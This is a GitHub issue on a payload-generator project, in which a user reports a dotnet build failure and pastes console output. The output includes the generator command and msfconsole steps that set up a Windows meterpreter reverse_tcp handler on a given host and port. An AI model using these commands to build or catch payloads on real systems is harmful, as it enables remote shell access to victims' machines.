payloadGenerator icon indicating copy to clipboard operation
payloadGenerator copied to clipboard

build failed

Open sec13b opened this issue 1 year ago • 1 comments

The build failed. Fix the build errors and run again.

sudo python3 generate.py -ip 10.168.10.128 -port 11011 -key vICWUPWkPFVsRGfWoevyhlTUGCPGkeNY
python3 generate.py -ip 10.168.10.128 -port 11011 -key vICWUPWkPFVsRGfWoevyhlTUGCPGkeNY

Same error for both

> Generator goes brrrr
> Generating encoded shellcode
> Generating payload

The build failed. Fix the build errors and run again.
> Cleanup
cp: cannot stat '/home/kali/Desktop/payloadGenerator/Payload/bin/Release/net45/win10-x64/Payload.exe': No such file or directory
> Open msfconsole and run the following:


use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.168.10.128
set LPORT 11011
set EXITFUNC thread
run -j

You should see payload.exe now
┌──(kali㉿kali)-[~/Desktop/payloadGenerator]
└─$ dotnet --version
6.0.425
                                                                                                                                                                                               
┌──(kali㉿kali)-[~/Desktop/payloadGenerator]
└─$

sec13b avatar Aug 24 '24 07:08 sec13b

windows

image

sec13b avatar Aug 24 '24 08:08 sec13b